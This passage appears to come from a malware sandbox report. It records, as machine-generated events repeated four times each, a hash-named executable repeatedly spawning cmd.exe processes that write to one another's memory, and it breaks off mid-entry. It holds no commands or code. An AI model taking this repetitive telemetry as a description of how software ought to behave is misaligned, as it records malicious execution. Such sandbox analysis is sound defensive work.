PID 1796 wrote to memory of 564 1796 cmd.exe 761 PID 1796 wrote to memory of 564 1796 cmd.exe 761 PID 1796 wrote to memory of 1216 1796 cmd.exe 762 PID 1796 wrote to memory of 1216 1796 cmd.exe 762 PID 1796 wrote to memory of 1216 1796 cmd.exe 762 PID 1796 wrote to memory of 1216 1796 cmd.exe 762 PID 1796 wrote to memory of 884 1796 cmd.exe 763 PID 1796 wrote to memory of 884 1796 cmd.exe 763 PID 1796 wrote to memory of 884 1796 cmd.exe 763 PID 1796 wrote to memory of 884 1796 cmd.exe 763 PID 884 wrote to memory of 1232 884 cmd.exe 764 PID 884 wrote to memory of 1232 884 cmd.exe 764 PID 884 wrote to memory of 1232 884 cmd.exe 764 PID 884 wrote to memory of 1232 884 cmd.exe 764 PID 1796 wrote to memory of 888 1796 cmd.exe 765 PID 1796 wrote to memory of 888 1796 cmd.exe 765 PID 1796 wrote to memory of 888 1796 cmd.exe 765 PID 1796 wrote to memory of 888 1796 cmd.exe 765 PID 616 wrote to memory of 1176 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 766 PID 616 wrote to memory of 1176 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 766 PID 616 wrote to memory of 1176 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 766 PID 616 wrote to memory of 1176 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 766 PID 1176 wrote to memory of 368 1176 cmd.exe 768 PID 1176 wrote to memory of 368 1176 cmd.exe 768 PID 1176 wrote to memory of 368 1176 cmd.exe 768 PID 1176 wrote to memory of 368 1176 cmd.exe 768 PID 1176 wrote to memory of 436 1176 cmd.exe 769 PID 1176 wrote to memory of 436 1176 cmd.exe 769 PID 1176 wrote to memory of 436 1176 cmd.exe 769 PID 1176 wrote to memory of 436 1176 cmd.exe 769 PID 1176 wrote to memory of 1832 1176 cmd.exe 770 PID 1176 wrote to memory of 1832 1176 cmd.exe 770 PID 1176 wrote to memory of 1832 1176 cmd.exe 770 PID 1176 wrote to memory of 1832 1176 cmd.exe 770 PID 1832 wrote to memory of 688 1832 cmd.exe 771 PID 1832 wrote to memory of 688 1832 cmd.exe 771 PID 1832 wrote to memory of 688 1832 cmd.exe 771 PID 1832 wrote to memory of 688 1832 cmd.exe 771 PID 1176 wrote to memory of 1120 1176 cmd.exe 772 PID 1176 wrote to memory of 1120 1176 cmd.exe 772 PID 1176 wrote to memory of 1120 1176 cmd.exe 772 PID 1176 wrote to memory of 1120 1176 cmd.exe 772 PID 616 wrote to memory of 1188 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 773 PID 616 wrote to memory of 1188 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 773 PID 616 wrote to memory of 1188 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 773 PID 616 wrote to memory of 1188 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 773 PID 1188 wrote to memory of 972 1188 cmd.exe 775 PID 1188 wrote to memory of 972 1188 cmd.exe 775 PID 1188 wrote to memory of 972 1188 cmd.exe 775 PID 1188 wrote to memory of 972 1188 cmd.exe 775 PID 1188 wrote to memory of 1808 1188 cmd.exe 776 PID 1188 wrote to memory of 1808 1188 cmd.exe 776 PID 1188 wrote to memory of 1808 1188 cmd.exe 776 PID 1188 wrote to memory of 1808 1188 cmd.exe 776 PID 1188 wrote to memory of 1776 1188 cmd.exe 777 PID 1188 wrote to memory of 1776 1188 cmd.exe 777 PID 1188 wrote to memory of 1776 1188 cmd.exe 777 PID 1188 wrote to memory of 1776 1188 cmd.exe 777 PID 1776 wrote to memory of 920 1776 cmd.exe 778 PID 1776 wrote to memory of 920 1776 cmd.exe 778 PID 1776 wrote to memory of 920 1776 cmd.exe 778 PID 1776 wrote to memory of 920 1776 cmd.exe 778 PID 1188 wrote to memory of 548 1188 cmd.exe 779 PID 1188 wrote to memory of 548 1188 cmd.exe 779 PID 1188 wrote to memory of 548 1188 cmd.exe 779 PID 1188 wrote to memory of 548 1188 cmd.exe 779 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 780 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 780 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 780 PID 616 wrote to memory of 1956 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 780 PID 1956 wrote to memory of 672 1956 cmd.exe 782 PID 1956 wrote to memory of 672 1956 cmd.exe 782 PID 1956 wrote to memory of 672 1956 cmd.exe 782 PID 1956 wrote to memory of 672 1956 cmd.exe 782 PID 1956 wrote to memory of 1232 1956 cmd.exe 783 PID 1956 wrote to memory of 1232 1956 cmd.exe 783 PID 1956 wrote to memory of 1232 1956 cmd.exe 783 PID 1956 wrote to memory of 1232 1956 cmd.exe 783 PID 1956 wrote to memory of 1256 1956 cmd.exe 784 PID 1956 wrote to memory of 1256 1956 cmd.exe 784 PID 1956 wrote to memory of 1256 1956 cmd.exe 784 PID 1956 wrote to memory of 1256 1956 cmd.exe 784 PID 1256 wrote to memory of 1680 1256 cmd.exe 785 PID 1256 wrote to memory of 1680 1256 cmd.exe 785 PID 1256 wrote to memory of 1680 1256 cmd.exe 785 PID 1256 wrote to memory of 1680 1256 cmd.exe 785 PID 1956 wrote to memory of 228 1956 cmd.exe 786 PID 1956 wrote to memory of 228 1956 cmd.exe 786 PID 1956 wrote to memory of 228 1956 cmd.exe 786 PID 1956 wrote to memory of 228 1956 cmd.exe 786 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 787 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 787 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 787 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 787 PID 1492 wrote to memory of 1516 1492 cmd.exe 789 PID 1492 wrote to memory of 1516 1492 cmd.exe 789 PID 1492 wrote to memory of 1516 1492 cmd.exe 789 PID 1492 wrote to memory of 1516 1492 cmd.exe 789 PID 1492 wrote to memory of 688 1492 cmd.exe 790 PID 1492 wrote to memory of 688 1492 cmd.exe 790 PID 1492 wrote to memory of 688 1492 cmd.exe 790 PID 1492 wrote to memory of 688 1492 cmd.exe 790 PID 1492 wrote to memory of 528 1492 cmd.exe 791 PID 1492 wrote to memory of 528 1492 cmd.exe 791 PID 1492 wrote to memory of 528 1492 cmd.exe 791 PID 1492 wrote to memory of 528 1492 cmd.exe 791 PID 528 wrote to memory of 1332 528 cmd.exe 792 PID 528 wrote to memory of 1332 528 cmd.exe 792 PID 528 wrote to memory of 1332 528 cmd.exe 792 PID 528 wrote to memory of 1332 528 cmd.exe 792 PID 1492 wrote to memory of 952 1492 cmd.exe 793 PID 1492 wrote to memory of 952 1492 cmd.exe 793 PID 1492 wrote to memory of 952 1492 cmd.exe 793 PID 1492 wrote to memory of 952 1492 cmd.exe 793 PID 616 wrote to memory of 1136 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 794 PID 616 wrote to memory of 1136 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 794 PID 616 wrote to memory of 1136 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 794 PID 616 wrote to memory of 1136 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 794 PID 1136 wrote to memory of 1868 1136 cmd.exe 796 PID 1136 wrote to memory of 1868 1136 cmd.exe 796 PID 1136 wrote to memory of 1868 1136 cmd.exe 796 PID 1136 wrote to memory of 1868 1136 cmd.exe 796 PID 1136 wrote to memory of 1168 1136 cmd.exe 797 PID 1136 wrote to memory of 1168 1136 cmd.exe 797 PID 1136 wrote to memory of 1168 1136 cmd.exe 797 PID 1136 wrote to memory of 1168 1136 cmd.exe 797 PID 1136 wrote to memory of 964 1136 cmd.exe 798 PID 1136 wrote to memory of 964 1136 cmd.exe 798 PID 1136 wrote to memory of 964 1136 cmd.exe 798 PID 1136 wrote to memory of 964 1136 cmd.exe 798 PID 964 wrote to memory of 548 964 cmd.exe 799 PID 964 wrote to memory of 548 964 cmd.exe 799 PID 964 wrote to memory of 548 964 cmd.exe 799 PID 964 wrote to memory of 548 964 cmd.exe 799 PID 1136 wrote to memory of 1948 1136 cmd.exe 800 PID 1136 wrote to memory of 1948 1136 cmd.exe 800 PID 1136 wrote to memory of 1948 1136 cmd.exe 800 PID 1136 wrote to memory of 1948 1136 cmd.exe 800 PID 616 wrote to memory of 1212 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 801 PID 616 wrote to memory of 1212 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 801 PID 616 wrote to memory of 1212 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 801 PID 616 wrote to memory of 1212 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 801 PID 1212 wrote to memory of 1432 1212 cmd.exe 803 PID 1212 wrote to memory of 1432 1212 cmd.exe 803 PID 1212 wrote to memory of 1432 1212 cmd.exe 803 PID 1212 wrote to memory of 1432 1212 cmd.exe 803 PID 1212 wrote to memory of 1960 1212 cmd.exe 804 PID 1212 wrote to memory of 1960 1212 cmd.exe 804 PID 1212 wrote to memory of 1960 1212 cmd.exe 804 PID 1212 wrote to memory of 1960 1212 cmd.exe 804 PID 1212 wrote to memory of 1944 1212 cmd.exe 805 PID 1212 wrote to memory of 1944 1212 cmd.exe 805 PID 1212 wrote to memory of 1944 1212 cmd.exe 805 PID 1212 wrote to memory of 1944 1212 cmd.exe 805 PID 1944 wrote to memory of 228 1944 cmd.exe 806 PID 1944 wrote to memory of 228 1944 cmd.exe 806 PID 1944 wrote to memory of 228 1944 cmd.exe 806 PID 1944 wrote to memory of 228 1944 cmd.exe 806 PID 1212 wrote to memory of 232 1212 cmd.exe 807 PID 1212 wrote to memory of 232 1212 cmd.exe 807 PID 1212 wrote to memory of 232 1212 cmd.exe 807 PID 1212 wrote to memory of 232 1212 cmd.exe 807 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 808 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 808 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 808 PID 616 wrote to memory of 1488 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 808 PID 1488 wrote to memory of 1684 1488 cmd.exe 810 PID 1488 wrote to memory of 1684 1488 cmd.exe 810 PID 1488 wrote to memory of 1684 1488 cmd.exe 810 PID 1488 wrote to memory of 1684 1488 cmd.exe 810 PID 1488 wrote to memory of 1332 1488 cmd.exe 811 PID 1488 wrote to memory of 1332 1488 cmd.exe 811 PID 1488 wrote to memory of 1332 1488 cmd.exe 811 PID 1488 wrote to memory of 1332 1488 cmd.exe 811 PID 1488 wrote to memory of 1936 1488 cmd.exe 812 PID 1488 wrote to memory of 1936 1488 cmd.exe 812 PID 1488 wrote to memory of 1936 1488 cmd.exe 812 PID 1488 wrote to memory of 1936 1488 cmd.exe 812 PID 1936 wrote to memory of 952 1936 cmd.exe 813 PID 1936 wrote to memory of 952 1936 cmd.exe 813 PID 1936 wrote to memory of 952 1936 cmd.exe 813 PID 1936 wrote to memory of 952 1936 cmd.exe 813 PID 1488 wrote to memory of 2032 1488 cmd.exe 814 PID 1488 wrote to memory of 2032 1488 cmd.exe 814 PID 1488 wrote to memory of 2032 1488 cmd.exe 814 PID 1488 wrote to memory of 2032 1488 cmd.exe 814 PID 616 wrote to memory of 920 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 815 PID 616 wrote to memory of 920 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 815 PID 616 wrote to memory of 920 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 815 PID 616 wrote to memory of 920 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 815 PID 920 wrote to memory of 860 920 cmd.exe 817 PID 920 wrote to memory of 860 920 cmd.exe 817 PID 920 wrote to memory of 860 920 cmd.exe 817 PID 920 wrote to memory of 860 920 cmd.exe 817 PID 920 wrote to memory of 1980 920 cmd.exe 818 PID 920 wrote to memory of 1980 920 cmd.exe 818 PID 920 wrote to memory of 1980 920 cmd.exe 818 PID 920 wrote to memory of 1980 920 cmd.exe 818 PID 920 wrote to memory of 224 920 cmd.exe 819 PID 920 wrote to memory of 224 920 cmd.exe 819 PID 920 wrote to memory of 224 920 cmd.exe 819 PID 920 wrote to memory of 224 920 cmd.exe 819 PID 224 wrote to memory of 1948 224 cmd.exe 820 PID 224 wrote to memory of 1948 224 cmd.exe 820 PID 224 wrote to memory of 1948 224 cmd.exe 820 PID 224 wrote to memory of 1948 224 cmd.exe 820 PID 920 wrote to memory of 472 920 cmd.exe 821 PID 920 wrote to memory of 472 920 cmd.exe 821 PID 920 wrote to memory of 472 920 cmd.exe 821 PID 920 wrote to memory of 472 920 cmd.exe 821 PID 616 wrote to memory of 1796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 822 PID 616 wrote to memory of 1796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 822 PID 616 wrote to memory of 1796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 822 PID 616 wrote to memory of 1796 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 822 PID 1796 wrote to memory of 1216 1796 cmd.exe 824 PID 1796 wrote to memory of 1216 1796 cmd.exe 824 PID 1796 wrote to memory of 1216 1796 cmd.exe 824 PID 1796 wrote to memory of 1216 1796 cmd.exe 824 PID 1796 wrote to memory of 1076 1796 cmd.exe 825 PID 1796 wrote to memory of 1076 1796 cmd.exe 825 PID 1796 wrote to memory of 1076 1796 cmd.exe 825 PID 1796 wrote to memory of 1076 1796 cmd.exe 825 PID 1796 wrote to memory of 680 1796 cmd.exe 826 PID 1796 wrote to memory of 680 1796 cmd.exe 826 PID 1796 wrote to memory of 680 1796 cmd.exe 826 PID 1796 wrote to memory of 680 1796 cmd.exe 826 PID 680 wrote to memory of 232 680 cmd.exe 827 PID 680 wrote to memory of 232 680 cmd.exe 827 PID 680 wrote to memory of 232 680 cmd.exe 827 PID 680 wrote to memory of 232 680 cmd.exe 827 PID 1796 wrote to memory of 1112 1796 cmd.exe 828 PID 1796 wrote to memory of 1112 1796 cmd.exe 828 PID 1796 wrote to memory of 1112 1796 cmd.exe 828 PID 1796 wrote to memory of 1112 1796 cmd.exe 828 PID 616 wrote to memory of 1996 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 829 PID 616 wrote to memory of 1996 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 829 PID 616 wrote to memory of 1996 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 829 PID 616 wrote to memory of 1996 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 829 PID 1996 wrote to memory of 1492 1996 cmd.exe 831 PID 1996 wrote to memory of 1492 1996 cmd.exe 831 PID 1996 wrote to memory of 1492 1996 cmd.exe 831 PID 1996 wrote to memory of 1492 1996 cmd.exe 831 PID 1996 wrote to memory of 1828 1996 cmd.exe 832 PID 1996 wrote to memory of 1828 1996 cmd.exe 832 PID 1996 wrote to memory of 1828 1996 cmd.exe 832 PID 1996 wrote to memory of 1828 1996 cmd.exe 832 PID 1996 wrote to memory of 1340 1996 cmd.exe 833 PID 1996 wrote to memory of 1340 1996 cmd.exe 833 PID 1996 wrote to memory of 1340 1996 cmd.exe 833 PID 1996 wrote to memory of 1340 1996 cmd.exe 833 PID 1340 wrote to memory of 1964 1340 cmd.exe 834 PID 1340 wrote to memory of 1964 1340 cmd.exe 834 PID 1340 wrote to memory of 1964 1340 cmd.exe 834 PID 1340 wrote to memory of 1964 1340 cmd.exe 834 PID 1996 wrote to memory of 908 1996 cmd.exe 835 PID 1996 wrote to memory of 908 1996 cmd.exe 835 PID 1996 wrote to memory of 908 1996 cmd.exe 835 PID 1996 wrote to memory of 908 1996 cmd.exe 835 PID 616 wrote to memory of 1756 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 836 PID 616 wrote to memory of 1756 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 836 PID 616 wrote to memory of 1756 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 836 PID 616 wrote to memory of 1756 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 836 PID 1756 wrote to memory of 1136 1756 cmd.exe 838 PID 1756 wrote to memory of 1136 1756 cmd.exe 838 PID 1756 wrote to memory of 1136 1756 cmd.exe 838 PID 1756 wrote to memory of 1136 1756 cmd.exe 838 PID 1756 wrote to memory of 1584 1756 cmd.exe 839 PID 1756 wrote to memory of 1584 1756 cmd.exe 839 PID 1756 wrote to memory of 1584 1756 cmd.exe 839 PID 1756 wrote to memory of 1584 1756 cmd.exe 839 PID 1756 wrote to memory of 1680 1756 cmd.exe 840 PID 1756 wrote to memory of 1680 1756 cmd.exe 840 PID 1756 wrote to memory of 1680 1756 cmd.exe 840 PID 1756 wrote to memory of 1680 1756 cmd.exe 840 PID 1680 wrote to memory of 1188 1680 cmd.exe 841 PID 1680 wrote to memory of 1188 1680 cmd.exe 841 PID 1680 wrote to memory of 1188 1680 cmd.exe 841 PID 1680 wrote to memory of 1188 1680 cmd.exe 841 PID 1756 wrote to memory of 660 1756 cmd.exe 842 PID 1756 wrote to memory of 660 1756 cmd.exe 842 PID 1756 wrote to memory of 660 1756 cmd.exe 842 PID 1756 wrote to memory of 660 1756 cmd.exe 842 PID 616 wrote to memory of 1216 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 843 PID 616 wrote to memory of 1216 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 843 PID 616 wrote to memory of 1216 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 843 PID 616 wrote to memory of 1216 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 843 PID 1216 wrote to memory of 2036 1216 cmd.exe 845 PID 1216 wrote to memory of 2036 1216 cmd.exe 845 PID 1216 wrote to memory of 2036 1216 cmd.exe 845 PID 1216 wrote to memory of 2036 1216 cmd.exe 845 PID 1216 wrote to memory of 680 1216 cmd.exe 846 PID 1216 wrote to memory of 680 1216 cmd.exe 846 PID 1216 wrote to memory of 680 1216 cmd.exe 846 PID 1216 wrote to memory of 680 1216 cmd.exe 846 PID 1216 wrote to memory of 1112 1216 cmd.exe 847 PID 1216 wrote to memory of 1112 1216 cmd.exe 847 PID 1216 wrote to memory of 1112 1216 cmd.exe 847 PID 1216 wrote to memory of 1112 1216 cmd.exe 847 PID 1112 wrote to memory of 1796 1112 cmd.exe 848 PID 1112 wrote to memory of 1796 1112 cmd.exe 848 PID 1112 wrote to memory of 1796 1112 cmd.exe 848 PID 1112 wrote to memory of 1796 1112 cmd.exe 848 PID 1216 wrote to memory of 1332 1216 cmd.exe 849 PID 1216 wrote to memory of 1332 1216 cmd.exe 849 PID 1216 wrote to memory of 1332 1216 cmd.exe 849 PID 1216 wrote to memory of 1332 1216 cmd.exe 849 PID 616 wrote to memory of 948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 850 PID 616 wrote to memory of 948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 850 PID 616 wrote to memory of 948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 850 PID 616 wrote to memory of 948 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 850 PID 948 wrote to memory of 1516 948 cmd.exe 852 PID 948 wrote to memory of 1516 948 cmd.exe 852 PID 948 wrote to memory of 1516 948 cmd.exe 852 PID 948 wrote to memory of 1516 948 cmd.exe 852 PID 948 wrote to memory of 1468 948 cmd.exe 853 PID 948 wrote to memory of 1468 948 cmd.exe 853 PID 948 wrote to memory of 1468 948 cmd.exe 853 PID 948 wrote to memory of 1468 948 cmd.exe 853 PID 948 wrote to memory of 908 948 cmd.exe 854 PID 948 wrote to memory of 908 948 cmd.exe 854 PID 948 wrote to memory of 908 948 cmd.exe 854 PID 948 wrote to memory of 908 948 cmd.exe 854 PID 908 wrote to memory of 1996 908 cmd.exe 855 PID 908 wrote to memory of 1996 908 cmd.exe 855 PID 908 wrote to memory of 1996 908 cmd.exe 855 PID 908 wrote to memory of 1996 908 cmd.exe 855 PID 948 wrote to memory of 1808 948 cmd.exe 856 PID 948 wrote to memory of 1808 948 cmd.exe 856 PID 948 wrote to memory of 1808 948 cmd.exe 856 PID 948 wrote to memory of 1808 948 cmd.exe 856 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 857 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 857 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 857 PID 616 wrote to memory of 888 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 857 PID 888 wrote to memory of 1868 888 cmd.exe 859 PID 888 wrote to memory of 1868 888 cmd.exe 859 PID 888 wrote to memory of 1868 888 cmd.exe 859 PID 888 wrote to memory of 1868 888 cmd.exe 859 PID 888 wrote to memory of 1152 888 cmd.exe 860 PID 888 wrote to memory of 1152 888 cmd.exe 860 PID 888 wrote to memory of 1152 888 cmd.exe 860 PID 888 wrote to memory of 1152 888 cmd.exe 860 PID 888 wrote to memory of 660 888 cmd.exe 861 PID 888 wrote to memory of 660 888 cmd.exe 861 PID 888 wrote to memory of 660 888 cmd.exe 861 PID 888 wrote to memory of 660 888 cmd.exe 861 PID 660 wrote to memory of 964 660 cmd.exe 862 PID 660 wrote to memory of 964 660 cmd.exe 862 PID 660 wrote to memory of 964 660 cmd.exe 862 PID 660 wrote to memory of 964 660 cmd.exe 862 PID 888 wrote to memory of 232 888 cmd.exe 863 PID 888 wrote to memory of 232 888 cmd.exe 863 PID 888 wrote to memory of 232 888 cmd.exe 863 PID 888 wrote to memory of 232 888 cmd.exe 863 PID 616 wrote to memory of 1832 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 864 PID 616 wrote to memory of 1832 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 864 PID 616 wrote to memory of 1832 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 864 PID 616 wrote to memory of 1832 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 864 PID 1832 wrote to memory of 1060 1832 cmd.exe 866 PID 1832 wrote to memory of 1060 1832 cmd.exe 866 PID 1832 wrote to memory of 1060 1832 cmd.exe 866 PID 1832 wrote to memory of 1060 1832 cmd.exe 866 PID 1832 wrote to memory of 952 1832 cmd.exe 867 PID 1832 wrote to memory of 952 1832 cmd.exe 867 PID 1832 wrote to memory of 952 1832 cmd.exe 867 PID 1832 wrote to memory of 952 1832 cmd.exe 867 PID 1832 wrote to memory of 1332 1832 cmd.exe 868 PID 1832 wrote to memory of 1332 1832 cmd.exe 868 PID 1832 wrote to memory of 1332 1832 cmd.exe 868 PID 1832 wrote to memory of 1332 1832 cmd.exe 868 PID 1332 wrote to memory of 1216 1332 cmd.exe 869 PID 1332 wrote to memory of 1216 1332 cmd.exe 869 PID 1332 wrote to memory of 1216 1332 cmd.exe 869 PID 1332 wrote to memory of 1216 1332 cmd.exe 869 PID 1832 wrote to memory of 972 1832 cmd.exe 870 PID 1832 wrote to memory of 972 1832 cmd.exe 870 PID 1832 wrote to memory of 972 1832 cmd.exe 870 PID 1832 wrote to memory of 972 1832 cmd.exe 870 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 871 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 871 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 871 PID 616 wrote to memory of 624 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 871 PID 624 wrote to memory of 1460 624 cmd.exe 873 PID 624 wrote to memory of 1460 624 cmd.exe 873 PID 624 wrote to memory of 1460 624 cmd.exe 873 PID 624 wrote to memory of 1460 624 cmd.exe 873 PID 624 wrote to memory of 360 624 cmd.exe 874 PID 624 wrote to memory of 360 624 cmd.exe 874 PID 624 wrote to memory of 360 624 cmd.exe 874 PID 624 wrote to memory of 360 624 cmd.exe 874 PID 624 wrote to memory of 1560 624 cmd.exe 875 PID 624 wrote to memory of 1560 624 cmd.exe 875 PID 624 wrote to memory of 1560 624 cmd.exe 875 PID 624 wrote to memory of 1560 624 cmd.exe 875 PID 1560 wrote to memory of 1488 1560 cmd.exe 876 PID 1560 wrote to memory of 1488 1560 cmd.exe 876 PID 1560 wrote to memory of 1488 1560 cmd.exe 876 PID 1560 wrote to memory of 1488 1560 cmd.exe 876 PID 624 wrote to memory of 884 624 cmd.exe 877 PID 624 wrote to memory of 884 624 cmd.exe 877 PID 624 wrote to memory of 884 624 cmd.exe 877 PID 624 wrote to memory of 884 624 cmd.exe 877 PID 616 wrote to memory of 228 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 878 PID 616 wrote to memory of 228 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 878 PID 616 wrote to memory of 228 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 878 PID 616 wrote to memory of 228 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 878 PID 228 wrote to memory of 964 228 cmd.exe 880 PID 228 wrote to memory of 964 228 cmd.exe 880 PID 228 wrote to memory of 964 228 cmd.exe 880 PID 228 wrote to memory of 964 228 cmd.exe 880 PID 228 wrote to memory of 672 228 cmd.exe 881 PID 228 wrote to memory of 672 228 cmd.exe 881 PID 228 wrote to memory of 672 228 cmd.exe 881 PID 228 wrote to memory of 672 228 cmd.exe 881 PID 228 wrote to memory of 2040 228 cmd.exe 882 PID 228 wrote to memory of 2040 228 cmd.exe 882 PID 228 wrote to memory of 2040 228 cmd.exe 882 PID 228 wrote to memory of 2040 228 cmd.exe 882 PID 2040 wrote to memory of 1200 2040 cmd.exe 883 PID 2040 wrote to memory of 1200 2040 cmd.exe 883 PID 2040 wrote to memory of 1200 2040 cmd.exe 883 PID 2040 wrote to memory of 1200 2040 cmd.exe 883 PID 228 wrote to memory of 1256 228 cmd.exe 884 PID 228 wrote to memory of 1256 228 cmd.exe 884 PID 228 wrote to memory of 1256 228 cmd.exe 884 PID 228 wrote to memory of 1256 228 cmd.exe 884 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 885 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 885 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 885 PID 616 wrote to memory of 1492 616 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe 885 PID 1492 wrote to memory of 976 1492 cmd.exe 887 PID 